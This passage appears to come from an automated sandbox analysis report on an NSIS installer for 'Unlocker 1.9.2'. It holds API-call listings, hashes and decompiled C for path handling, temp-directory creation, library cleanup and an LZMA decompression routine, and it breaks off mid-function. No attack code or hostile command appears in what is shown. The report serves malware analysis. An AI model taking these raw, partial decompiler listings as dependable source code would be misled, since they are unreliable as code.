                                                                                                                                                              				return 0;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405604
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405614
                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 3248276644-3404278061
                                                                                                                                                              • Opcode ID: 658a5dec63a6dfd38c94e6fe1a96680d2d49e1cb79ea5bcfe5db1de8d6a58f0a
                                                                                                                                                              • Instruction ID: 3cda5072feefcb47a16d69abed3bdaa5828b8ced6428ee97c76234aedc7658ab
                                                                                                                                                              • Opcode Fuzzy Hash: 658a5dec63a6dfd38c94e6fe1a96680d2d49e1cb79ea5bcfe5db1de8d6a58f0a
                                                                                                                                                              • Instruction Fuzzy Hash: C2F02831104E903AC723223A1C06A9F1A96CE86369B58053FF855B12D5DA3C8943DD7E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00403097(void* __eflags) {
                                                                                                                                                              				void* _t2;
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				CHAR* _t6;
                                                                                                                                                              
                                                                                                                                                              				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                                                                                              				E00405C3F(_t6);
                                                                                                                                                              				_t2 = E0040553D(_t6);
                                                                                                                                                              				if(_t2 != 0) {
                                                                                                                                                              					E004054D0(_t6);
                                                                                                                                                              					CreateDirectoryA(_t6, 0); // executed
                                                                                                                                                              					_t5 = E004056E3("1033", _t6); // executed
                                                                                                                                                              					return _t5;
                                                                                                                                                              				} else {
                                                                                                                                                              					return _t2;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 4115351271-517883005
                                                                                                                                                              • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                                                              • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                                                              • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403491() {
                                                                                                                                                              				void* _t2;
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              
                                                                                                                                                              				_t8 =  *0x41f434; // 0x0
                                                                                                                                                              				_t3 = E00403476(_t2, 0);
                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						_t6 = _t8;
                                                                                                                                                              						_t8 =  *_t8;
                                                                                                                                                              						FreeLibrary( *(_t6 + 8)); // executed
                                                                                                                                                              						_t3 = GlobalFree(_t6);
                                                                                                                                                              					} while (_t8 != 0);
                                                                                                                                                              				}
                                                                                                                                                              				 *0x41f434 =  *0x41f434 & 0x00000000;
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004034B2
                                                                                                                                                              Strings
                                                                                                                                                              • "C:\Users\user\Desktop\Unlocker1.9.2.exe", xrefs: 004034A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"
                                                                                                                                                              • API String ID: 1100898210-3781551375
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                              			E004063DD() {
                                                                                                                                                              				signed int _t530;
                                                                                                                                                              				void _t537;
                                                                                                                                                              				signed int _t538;
                                                                                                                                                              				signed int _t539;
                                                                                                                                                              				unsigned short _t569;
                                                                                                                                                              				signed int _t579;
                                                                                                                                                              				signed int _t607;
                                                                                                                                                              				void* _t627;
                                                                                                                                                              				signed int _t628;
                                                                                                                                                              				signed int _t635;
                                                                                                                                                              				signed int* _t643;
                                                                                                                                                              				void* _t644;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					_t530 =  *(_t644 - 0x30);
                                                                                                                                                              					if(_t530 >= 4) {
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t644 - 0x40) = 6;
                                                                                                                                                              					 *(_t644 - 0x7c) = 0x19;
                                                                                                                                                              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L145:
                                                                                                                                                              						 *(_t644 - 0x50) = 1;
                                                                                                                                                              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L149:
                                                                                                                                                              							if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                              								goto L155;
                                                                                                                                                              							}
                                                                                                                                                              							L150:
                                                                                                                                                              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                                                              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                                                              							 *(_t644 - 0x54) = _t643;
                                                                                                                                                              							_t569 =  *_t643;
                                                                                                                                                              							_t635 = _t569 & 0x0000ffff;
                                                                                                                                                              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                                                              							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                                                              								_t628 = _t627 + 1;
                                                                                                                                                              								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                                                              								 *(_t644 - 0x50) = _t628;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(_t644 - 0x10) = _t607;
                                                                                                                                                              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                                                              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                              								L148:
                                                                                                                                                              								_t487 = _t644 - 0x48;
                                                                                                                                                              								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                                                              								L149:
                                                                                                                                                              								if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								goto L150;
                                                                                                                                                              							} else {
                                                                                                                                                              								L154:
                                                                                                                                                              								L146:
                                                                                                                                                              								if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                              									L169:
                                                                                                                                                              									 *(_t644 - 0x88) = 0x18;
                                                                                                                                                              									L170:
                                                                                                                                                              									_t579 = 0x22;
                                                                                                                                                              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                                                              									_t539 = 0;
                                                                                                                                                              									L172:
                                                                                                                                                              									return _t539;
                                                                                                                                                              								}
                                                                                                                                                              								L147:
                                                                                                                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                              								_t484 = _t644 - 0x70;
                                                                                                                                                              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                              								goto L148;
                                                                                                                                                              							}
                                                                                                                                                              							L155:
                                                                                                                                                              							_t537 =  *(_t644 - 0x7c);
                                                                                                                                                              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L140:
                                                                                                                                                              								 *(_t644 - 0x88) = _t537;
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L1:
                                                                                                                                                              									_t538 =  *(_t644 - 0x88);
                                                                                                                                                              									if(_t538 > 0x1c) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									L2:
                                                                                                                                                              									switch( *((intOrPtr*)(_t538 * 4 +  &M0040684B))) {
                                                                                                                                                              										case 0:
                                                                                                                                                              											L3:
                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L4:
                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                              											_t538 =  *( *(_t644 - 0x70));
                                                                                                                                                              											if(_t538 > 0xe1) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											}
                                                                                                                                                              											L5:
                                                                                                                                                              											_t542 = _t538 & 0x000000ff;
                                                                                                                                                              											_push(0x2d);
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_pop(_t581);
                                                                                                                                                              											_push(9);
                                                                                                                                                              											_pop(_t582);
                                                                                                                                                              											_t638 = _t542 / _t581;
                                                                                                                                                              											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                                                              											 *(_t644 - 0x3c) = _t633;
                                                                                                                                                              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                                                              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                                                              											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                                                              												L10:
                                                                                                                                                              												if(_t641 == 0) {
                                                                                                                                                              													L12:
                                                                                                                                                              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                                                              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                              													goto L15;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L11;
                                                                                                                                                              												}
                                                                                                                                                              												do {
                                                                                                                                                              													L11:
                                                                                                                                                              													_t641 = _t641 - 1;
                                                                                                                                                              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                                                              												} while (_t641 != 0);
                                                                                                                                                              												goto L12;
                                                                                                                                                              											}
                                                                                                                                                              											L6:
                                                                                                                                                              											if( *(_t644 - 4) != 0) {
                                                                                                                                                              												GlobalFree( *(_t644 - 4)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              											 *(_t644 - 4) = _t538;
                                                                                                                                                              											if(_t538 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                                                              												goto L10;
                                                                                                                                                              											}
                                                                                                                                                              										case 1:
                                                                                                                                                              											L13:
                                                                                                                                                              											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                              												L157:
                                                                                                                                                              												 *(_t644 - 0x88) = 1;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L14:
                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                              											_t45 = _t644 - 0x48;
                                                                                                                                                              											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                              											L15:
                                                                                                                                                              											if( *(_t644 - 0x48) < 4) {
                                                                                                                                                              												goto L13;
                                                                                                                                                              											}
                                                                                                                                                              											L16:
                                                                                                                                                              											_t550 =  *(_t644 - 0x40);
                                                                                                                                                              											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                                                              												L20:
                                                                                                                                                              												 *(_t644 - 0x48) = 5;
                                                                                                                                                              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              												goto L23;
                                                                                                                                                              											}
                                                                                                                                                              											L17:
                                                                                                                                                              											 *(_t644 - 0x74) = _t550;
                                                                                                                                                              											if( *(_t644 - 8) != 0) {
                                                                                                                                                              												GlobalFree( *(_t644 - 8)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                                                              											 *(_t644 - 8) = _t538;
                                                                                                                                                              											if(_t538 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L20;
                                                                                                                                                              											}
                                                                                                                                                              										case 2:
                                                                                                                                                              											L24:
                                                                                                                                                              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                                                              											 *(_t644 - 0x84) = 6;
                                                                                                                                                              											 *(_t644 - 0x4c) = _t557;
                                                                                                                                                              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                                                              											goto L132;
                                                                                                                                                              										case 3:
                                                                                                                                                              											L21:
                                                                                                                                                              											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                              												L158:
                                                                                                                                                              												 *(_t644 - 0x88) = 3;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L22:
                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                              											_t67 = _t644 - 0x70;
                                                                                                                                                              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                              											L23:
                                                                                                                                                              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                                                              											if( *(_t644 - 0x48) != 0) {
                                                                                                                                                              												goto L21;
                                                                                                                                                              											}
                                                                                                                                                              											goto L24;
                                                                                                                                                              										case 4:
                                                                                                                                                              											L133:
                                                                                                                                                              											_t559 =  *_t642;
                                                                                                                                                              											_t626 = _t559 & 0x0000ffff;
                                                                                                                                                              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                                                              											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                                                              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                                                              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                                                              												 *(_t644 - 0x40) = 1;
                                                                                                                                                              												_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                              												__eflags = _t560;
                                                                                                                                                              												 *_t642 = _t560;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(_t644 - 0x10) = _t596;
                                                                                                                                                              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                                                              											}
                                                                                                                                                              											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L139;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L137;
                                                                                                                                                              											}
                                                                                                                                                              										case 5:
                                                                                                                                                              											L137:
                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                              												L168:
                                                                                                                                                              												 *(_t644 - 0x88) = 5;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L138:
                                                                                                                                                              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                              											L139:
                                                                                                                                                              											_t537 =  *(_t644 - 0x84);
                                                                                                                                                              											L140:
                                                                                                                                                              											 *(_t644 - 0x88) = _t537;
                                                                                                                                                              											goto L1;
                                                                                                                                                              										case 6:
                                                                                                                                                              											L25:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												L36:
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												goto L132;
                                                                                                                                                              											}
                                                                                                                                                              											L26:
                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                              											__cl = 8;
                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
